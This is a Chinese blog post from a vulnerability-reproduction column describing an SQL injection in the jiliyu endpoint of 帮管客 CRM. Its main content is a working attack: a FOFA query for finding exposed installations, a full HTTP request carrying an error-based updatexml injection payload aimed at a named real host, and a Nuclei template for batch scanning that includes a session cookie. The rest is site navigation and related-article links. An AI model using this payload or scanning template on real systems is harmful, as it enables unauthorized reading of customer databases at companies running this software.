帮管客CRM-jiliyu接口存在SQl注入漏洞

最新推荐文章于 2024-06-15 23:54:28 发布
最新推荐文章于 2024-06-15 23:54:28 发布
阅读量605 收藏 7
点赞数 13
分类专栏: 漏洞复现 文章标签: sql 数据库 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37284805/article/details/136649806
版权

漏洞描述:

帮管客CRM是一款基于互联网的客户关系管理软件,主要用于帮助企业管理客户关系、提高销售效率、优化营销策略等。其jiliyu接口存在SQl注入漏洞,攻击者可使用此漏洞通过报错注入获取到数据库数据。

FOFA:

app="帮管客-CRM"

漏洞POC:

GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=%E6%BF%80%E5%8A%B1%E8%AF%AD%E5%88%97%E8%A1%A8&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: b.keyikao.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Nuclei 批量检测脚本:

id: template-id
info:
  name: Template Name
  author: xxx
  severity: info
  description: description
  reference:
    - https://
  tags: tags
http:
  - raw:
      - |+
        GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=%E6%BF%80%E5%8A%B1%E8%AF%AD%E5%88%97%E8%A1%A8&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/2
        Host: {{Hostname}}
        Cookie: bgk_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%224d1c37dc553928c2144e6889a61d2915%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22112.232.108.191%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A84%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10.15%3B+rv%3A123.0%29+Gecko%2F20100101+Firefox%2F123.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1709964694%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D366d726eadd8e1d5b0430fce4642a51149caccc5
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Upgrade-Insecure-Requests: 1
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: none
        Sec-Fetch-User: ?1
        Te: trailers

    matchers:
      - type: word
        part: body
        words:
          - 'XPATH syntax error: '

云瀚安行
关注
  • 13
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】管客-CRM-jiliyu-sql注入
知黑而守白
03-08 84
管客CRM基于先进的客户管理系的客户管理体系CRM营销理念设计集客户档案、销售记录、业务往来于一体,以凝聚客户关系、提升资源价值为核心,将潜在客户转化为现实客户,从而提高销量、用户满意度和企业竞争力。助客户CRM适用于中小企业的一般客户关系管理系统,整合了长期从事管理软件开发的丰富经验和先进技术,采用领先的系统B/S(浏览器/服务器)操作模式使网络办公不受地域限制。管客CRM客户资源管理系统 jiliyu 接口存在SQL注入漏洞
管客_CRM jiliyu接口 SQL注入漏洞
weixin_43567873的博客
03-15 54
管客_CRM jiliyu接口 SQL注入漏洞
管客CRM(jiliyu)接口SQL注入漏洞
做自己喜欢的事,并将其发挥到极致!
03-12 611
管客CRM客户管理系统专注于为企业提供crm客户关系管理、crm管理系统、crm软件产品及企业销售管理流程解决方案服务,助力企业业绩增长。管客CRM jiliyu接口存在SQL注入漏洞
管客CRM SQL注入漏洞
weixin_52204925的博客
02-03 564
管客CRM SQL注入漏洞
管客CRM免费版V4.2.2
09-16
管客CRM免费版
64717管客CRM免费版v3.6.0.rar
08-08
管客CRM是适用于中小企业的通用型客户关系管理系统,融合了管客软件长期从事管理软件开发的丰富经验与先进技术,该系统采用领先的B/S(浏览器/服务器)操作方式,使得网络办公不受地域限制。在功能上注重实用、...
PHP管客CRM客户管理系统 v5.1.0
10-21
管客CRM客户管理系统基于先进的CRM营销理念设计,集客户档案、销售记录、业务往来于一身,以凝聚客户关系、提升资源价值为核心,将潜在客户变为现实客户、从而提升销售量、提高用户的满意度,并增加企业竞争力。...
管客CRM客户管理系统
08-14
管客CRM客户管理系统基于先进的CRM营销理念设计,集客户档案、销售记录、业务往来于一身,以凝聚客户关系、提升资源价值为核心,将潜在客户变为现实客户、从而提升销售量、提
管客CRM客户管理系统 v1.0
10-06
面向中小企业的版本,易于安装维护,安全便捷,支持虚拟主机空间。 郑重承诺:本系统无任何后门及其他流氓手段。程序代码加密,不影响正常使用。 系统简介: 管客CRM客户
【大数据】Spark使用大全:下载安装、RDD操作、JAVA编程、SQL
Joker_ZJN的博客
06-13 1080
一文详解Spark的使用
Mybatis 动态 SQL 语句
Zachyy的博客
06-10 753
MyBatis 是一个优秀的持久层框架,它支持定制化 SQL、存储过程以及高级映射。在 MyBatis 中,动态 SQL 是一个非常重要的特性,它允许我们。动态SQL技术是一种的功能,它存在的意义是为了解决拼接SQL语句字符串时的痛点问题。
mysql-线上常用运维sql-2
jll126的博客
06-11 412
在MySQL中,直接查询当前正在执行的事务可能不是非常直观,因为MySQL并没有提供直接的命令或系统视图来列出所有正在运行的事务。但是,你可以通过几种方法间接地获取这些信息。
MySQL的高可用方案:深入Galera Cluster和ProxySQL
哎 你看的博客
06-15 999
一、引言 背景和重要性 面临的挑战和问题 高可用性介绍 二、Galera Cluster Galera Cluster简介 定义和用途 工作原理 特点和优势 部署Galera Cluster 准备工作 安装和配置 集群初始化及节点添加 Galera Cluster的运维 监控和维护 故障恢复和备份 优化和性能调整 三、ProxySQL ProxySQL简介 定义和用途 工作原理 特点和优势 部署ProxySQL 准备工作 安装和配置 连接管理和路由 ProxySQL运维 监控和维护 故障恢复和备份
取证工作: SysTools SQL Log Analyzer, 完整的 SQL Server 日志取证分析
sanyuan7783的博客
06-14 973
在深入研究 SQL 事务日志取证之前,让我们先看看 T-log 文件的真实情况。就像许多其他 RDBMS 一样,MS SQL Server 也遵循“预写日志记录”方法。这意味着所有事务在提交之前都写入日志文件,并保存对数据库所做的所有更改的记录。在 SQL 取证工作之前,用户需要知道,从逻辑上讲,事务日志被分类为几个较小的部分,称为 VLF 或虚拟日志文件。每个 SQL 数据库都使用多个 VLF,每个 VLF 的最小大小必须为 512 KB。日志中虚拟文件的大小和数量会随着日志大小的变化而变化。
PostgreSQL 快速入门与实战
代码洁癖症患者
06-11 947
# 创建模式## 删除模式## 删除模式并且删除该模式下的数据对象。
SpringBoot 项目,三种方式实现打印 sql 日志
人生苦短,我用python
06-14 238
【代码】SpringBoot 项目,三种方式实现打印 sql 日志。
PostgreSQL 的内置函数
一拳莫敌的博客
06-13 1086
PostgreSQL 提供了大量的内置函数,这些函数可以在查询中用于处理数据、进行计算和转换。
MyBatis 特殊SQL执行技巧与注意事项
最新发布
Zachyy的博客
06-15 1187
在处理特殊 SQL 查询时,我们需要根据具体的场景选择合适的参数绑定方式。对于模糊查询和批量删除等场景,推荐使用#{}来确保参数被正确预编译,防止SQL注入。对于需要动态设置表名等场景,由于无法预编译表名,只能使用${}来绑定参数,但需要确保传入的参数是可信的。
NL2SQL技术方案系列(1):NL2API、NL2SQL技术路径选择;LLM选型与Prompt工程技巧,揭秘项目落地优化之道
2401_85325726的博客
06-15 657
NL2SQL任务的目标是将用户对某个数据库的自然语言问题转化为相应的SQL查询。随着LLM的发展,使用LLM进行NL2SQL已成为一种新的范式。在这一过程中,如何利用提示工程来发掘LLM的NL2SQL能力显得尤为重要。数据结构****复杂:企业信息系统的数据结构复杂性远远超过几个简单的 Excel 文件,一个大型企业应用可能存在几百上千个数据实体,所以在实际应用中,大型 BI 系统会在前端经过汇聚、简化与抽象成新的语义层,方便理解。数据量较大。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值